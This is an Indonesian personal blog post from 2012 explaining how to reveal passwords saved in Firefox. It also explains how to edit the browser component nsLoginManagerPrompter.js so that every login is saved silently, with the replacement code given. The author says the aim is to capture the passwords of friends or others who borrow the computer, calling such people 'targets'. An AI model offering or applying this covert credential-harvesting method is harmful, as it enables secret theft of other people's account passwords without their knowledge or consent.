TERIMA KASIH ATAS KUNJUNGAN ANDA DI ALAMAT ENDY TIGER MA BLOG

78

di larang curi di sini JIKA MAU KOMENTAR DI BAWAH KOLOM KOMENTAR ADA PILIHAN NAH NANTI BERI KOMENTAR SEBAGAI (anonymous) SUPAYA KOMENTAR KAMU BISA TERTAMPIL....ITU CARA BAGI YANG MASUK TIDAK MELALUI EMAILdi larang curi di sini

Monday, July 2, 2012

menyimpang password secara otomatis di firefox

Pace mace di bawah ini saya coba kasih masuk satu info tentang cara menyimpang password secara manual dengan otomatis di mozilla firefox.supaya teman atau pun orang lain yang meminjam kitorang pu komputer,laptop atau notbook untuk online gampang kita  tau dorang pu password.....berikut ini caranya:

1) secara manual: kalau cara ini gampang sekali,waktu kitorang buka facebook atau situs lain di firefox disitu ada pilihan remember password klik saja di situ nanti password ter save,untuk cek password gampang saja ikuti langkah berikut:
ko klik saja Tools - Option - Security - Saved Password - Show Saved Password
nanti muncul password disitu dengan email.
coba lihat gambar  di bawah ko klik remember password.......



2) secara otomatis : Teknik ini sangat berguna jika target kita adalah orang yang kita kenal.
    tapi saya sarankan jangan pencuri password orang sembarangan.
    Oke, Ini dia caranya.:
(a) Tutup dulu firefox 
(b) ikuti langkah berikut Browse C:\Program Files\Mozilla Firefox\components\ dan temukan script bernama
    nsLoginManagerPrompter.js
(c) ko klik kanan trus open with ko buka dengan notepad + +  bukan notepad biasa kalau belum punya notepad + + ko download dulu,karna cuma notepad + +  yang bisa baca kode dari script di atas.
(d) ko ganti dari baris ke 642 sampai 711 dengan kode berikut:
var pwmgr = this._pwmgr
pwmgr.addLogin(aLogin)

nanti dia pu hasil seperti gambar berikut:

klo kurang jelas nanti sampaikan saja.....atau titp pesan di fb saya ok.......klo bisa....komen saja disini

memang saya juga belajar di orang terdekat saya dan juga di internet tapi saya coba membagi apa yang saya punya kepada sodara dorang,semua ilmu ada di internet cari saja pasti dapat ok MOMOTEH NDOT  by Endy tiger


No comments:

Post a Comment

onma

bagaimana dengan blog saya menurut anda

( Translate ) Sodara mau terjemahkan tulisan pake bahasa apa silahkan